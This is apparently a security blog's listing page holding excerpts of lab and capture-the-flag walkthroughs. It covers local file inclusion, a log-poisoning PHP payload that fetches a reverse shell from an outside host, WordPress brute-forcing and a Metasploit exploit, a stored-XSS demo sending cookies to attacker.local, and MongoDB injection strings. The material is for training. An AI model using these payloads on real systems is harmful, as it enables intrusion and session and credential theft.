Cyber Security | Web Development

http://10.10.120.68/?view=php://filter/convert.base64-encode/cat/resource=index http://10.10.120.68/?view=php://filter/convert.base64-encode/cat/resource=flag view-source:http://10.10.120.68/?view=../../../../etc/cat/../passwd&ext= view-source:http://10.10.120.68/?view=../../../../var/log/apache2/cat/../access.log&ext= https://toolbox.itsec.tamu.edu/ User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://10.8.135.218/shell.php'))?> Shell folder: cp /usr/share/webshells/php/php-reverse-shell.php . mv php-reverse-shell.php shell.php   cat shell.php //Make sure to modify the IP and port inside the shell file python -m http.server or 8081 rlwrap nc -lvnp 8888  find / -type f -name flag* 2>/dev/null //to find all flags Inside Shell: $ cd /var/www/html whoami id ls -la sudo -l sudo /usr/bin/env /bin/bash cd /root Final Flag: rlwrap nc -lvnp 8888   cd /opt/ cat backup.sh tar cf /root/container/backup/backup.tar /root/container sudo...

 Step 1: Gather Information: nmap scan           Open Ports, Version, FTP, SMB, RDP  Step 2: Gather Information: Directory Enumeration gobuster dir -u http://10.10.126.45 -w /usr/share/wordlists/dirb/big.txt -s 200,204,301,302,307,308 --status-codes-blacklist "" -t 20 -o blog.th Step 3: WPScan  wpscan --url http://blog.thm/ --enumerate p --enumerate t --enumerate u > wpscan_output.txt cat  Step 4: Brute-force Username & Password Step 5: Password taken from rockyou.txt wpscan --url http://blog.thm/ -P /root/Documents/Wordlists/rockyou.txt -U /root/usr.txt --verbose > UserEnumer.txt Step 6: Metasploitable use exploit/multi/http/wp_crop_rce set rhosts 10.10 . 109 . 33 set username kwheel set password cutiepie1 set LHOST <My_Machine_IP> run shell python -c 'import pty; pty.spawn("/bin/bash")' id Step 7:  Inside "Shell" - Walkthrough folder files access cd /home ls cd bjoel ls cat user. txt download /home/bjoel/Billy_Joe...

iOT Security Assessment Step 1: Install on your linux machine: Tools Pre-requisite: 1. hexdump hexdump is a Unix command-line tool that displays the raw byte content of a file in hexadecimal (hex) and sometimes ASCII format. It’s commonly used for analyzing binary files, firmware, memory dumps, or even debugging data structures. 2. binwalk + squashfs Binwalk is a powerful forensic and reverse engineering tool used primarily for analyzing and extracting firmware images. It's widely used in embedded device security testing, firmware analysis, and reverse engineering. 3. firmadyne Firmadyne is an automated firmware emulation and dynamic analysis framework designed to help security researchers emulate, instrument, and analyze Linux-based firmware images, especially for embedded devices like routers, IP cameras, and smart home devices. Step 2: Get the device and extract the firmware file. Let's assume we have a  Netgear IOT device model number is WNAP 320, extracted firmware.b...

Cookie Stealing via XSS Stored Vulnerability  Configuration: sudo nano /etc/hosts Victim Application: Step 1: Create and paste the code into index.html file <!DOCTYPE html> <html> <head><title>Test</title></head> <body>   <h1>Hello from test.local!</h1>   <a onclick="document.location='http://attacker.local:8080/steal.php?cookie=' + escape(document.cookie);" href="#">Click me</a>  <script>     // Set a test cookie     document.cookie = "session=ABC123"; </script> </body> </html> Run Command: sudo python3 -m http.server 80  Attacker Code: <?php if (isset($_GET['cookie'])) {     file_put_contents("log.txt", $_GET['cookie'] . "\n", FILE_APPEND | LOCK_EX);     header("Location: http://0.0.0.0/index.html");     exit(); } ?> Save as steal.php Run Command:  sudo php -S 0.0.0.0:8080 Finally, we successfully stole t...

  Burp Suite – Automated Vulnerabilities Findings Step 1:  Intercept with burp suite, which contains parameter values. Step 2: Forward the request to the Intruder option in Burp Suite. Step 3:  Set up the automated scan by right-clicking, selecting "Scan Defined Insertion Points" and opening the "Scan launcher". Step 4:  Wait until the scan is finished, and then check for the results with vulnerabilities. Step 5: Manual Validation

 This is demo exploit for MongoDB filter option. Filter Accessories : Business Logic: if(this.category == ""Accessories") { / ...do something } Exploitation: if(this.category == 'Accessories' && this.limit == 3)  // Original if( this.category == 'Accessories ' || '1' == '1 ' && this.limit == 3 )  // Payload Injected { / ...do something } Capture the request in the burp suite. Try with combination of symbolic to make error the request. "   '   $   {   }  `   ; Try with combination of Boolean expression  ' && 1 == 1 ' && '1' == '1 ' || 1 == 1 ' || '1' == '1 ' || 1 || ' || 1 || ' ' || '1' == '1 Note: Make sure apply with encode is CTRL + U.